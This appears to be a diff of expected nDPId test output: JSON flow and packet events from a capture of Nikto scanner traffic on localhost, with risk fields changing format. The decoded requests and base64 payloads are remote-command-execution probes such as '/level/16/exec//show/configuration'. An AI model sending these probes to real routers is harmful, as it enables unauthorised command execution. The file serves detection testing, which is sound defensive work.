+01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7440000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001258)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1576420277574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"ts_msec":1576420277574,"pkt":"AAAAAAAAAAAAAAAACABFAADcDd9AAEAGLjt\/AAABfwAAAcX6H5DZiDUt3Agrh4AYAED+0AAAAQEICp1m\/m6dZv5uR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001259)"}}
+01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001259)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1576420277575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"ts_msec":1576420277575,"pkt":"AAAAAAAAAAAAAAAACABFAADj4RhAAEAGWvp\/AAABfwAAAcX8H5B4Mdnl8T5RpIAYAED+1wAAAQEICp1m\/m+dZv5vR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMvc3RhdHVzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjApDQoNCg=="}
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces\/status","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001260)"}}
+01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces\/status","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001260)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1576420277577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"ts_msec":1576420277577,"pkt":"AAAAAAAAAAAAAAAACABFAADZSeNAAEAG8jl\/AAABfwAAAcX+H5DfuHEUhorfS4AYAED+zQAAAQEICp1m\/nGdZv5xR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3ZlcnNpb24gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/version","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001261)"}}
+01082{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/version","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001261)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7440000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1576420277578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":261,"pkt_l4_len":227,"ts_msec":1576420277578,"pkt":"AAAAAAAAAAAAAAAACABFAAD3GI1AAEAGI3J\/AAABfwAAAcYAH5BPCyB6v01M8IAYAED+6wAAAQEICp1m\/nKdZv5yR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3J1bm5pbmctY29uZmlnL2ludGVyZmFjZS9GYXN0RXRoZXJuZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI2MikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7440000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/running-config\/interface\/FastEthernet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001262)"}}
+01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7440000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/running-config\/interface\/FastEthernet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001262)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1576420277580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277580,"pkt":"AAAAAAAAAAAAAAAACABFAADIjaNAAEAGrop\/AAABfwAAAcYCH5DxgrVTaB5HZIAYAED+vAAAAQEICp1m\/nSdZv50R0VUIC9sZXZlbC8xNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001263)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001263)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1576420277581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277581,"pkt":"AAAAAAAAAAAAAAAACABFAADI2jFAAEAGYfx\/AAABfwAAAcYEH5BCjuLdnOtotYAYAED+vAAAAQEICp1m\/nWdZv51R0VUIC9sZXZlbC8xNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/17\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001264)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/17\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001264)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1576420277583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277583,"pkt":"AAAAAAAAAAAAAAAACABFAADIW7pAAEAG4HN\/AAABfwAAAcYGH5CxzGNMmxSh6IAYAED+vAAAAQEICp1m\/nedZv53R0VUIC9sZXZlbC8xOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/18\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001265)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/18\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001265)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1576420277584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277584,"pkt":"AAAAAAAAAAAAAAAACABFAADIKRRAAEAGExp\/AAABfwAAAcYIH5CpMBHnxNoUUoAYAED+vAAAAQEICp1m\/nidZv54R0VUIC9sZXZlbC8xOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjYpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/19\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001266)"}}
